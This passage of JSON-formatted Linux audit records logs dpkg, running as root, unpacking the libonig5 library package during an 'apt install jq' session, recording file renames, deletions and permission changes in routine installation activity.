"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/libonig.so.5.dpkg-new",
"inode": 808425,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.813:502",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/lib/x86_64-linux-gnu/libonig.so.5.0.0.dpkg-new",
"inode": 808421,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/lib/x86_64-linux-gnu/libonig.so.5.0.0",
"inode": 808421,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.817:503",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/libonig5/changelog.Debian.gz.dpkg-new",
"inode": 808423,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/libonig5/changelog.Debian.gz",
"inode": 808423,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.817:504",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/libonig5/copyright.dpkg-new",
"inode": 808424,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/libonig5/copyright",
"inode": 808424,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.817:505",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x556ebaf26ed0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/lib/x86_64-linux-gnu/libonig.so.5.dpkg-new",
"inode": 808425,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/lib/x86_64-linux-gnu/libonig.so.5",
"inode": 808425,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.817:506",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xa",
"0x1a4",
"0x0",
"0x1b6"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277013,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.817:507",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba46ca00",
"0x556eba44bd30",
"0x556eba7a8600",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/info/libonig5:amd64.list-new",
"inode": 277013,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libonig5:amd64.list",
"inode": 277013,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:508",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556ebb16c32e",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/symbols",
"inode": 277004,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:509",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/symbols",
"inode": 277004,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libonig5:amd64.symbols",
"inode": 277004,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:510",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556ebb16c34e",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/control",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:511",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556ebb16c36e",
"0x9",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/triggers",
"inode": 277008,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:512",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/triggers",
"inode": 277008,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libonig5:amd64.triggers",
"inode": 277008,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:513",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x2e",
"0x736269",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/shlibs",
"inode": 276994,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:514",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/shlibs",
"inode": 276994,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libonig5:amd64.shlibs",
"inode": 276994,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:515",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556ebb16c3c6",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/md5sums",
"inode": 276992,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.821:516",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
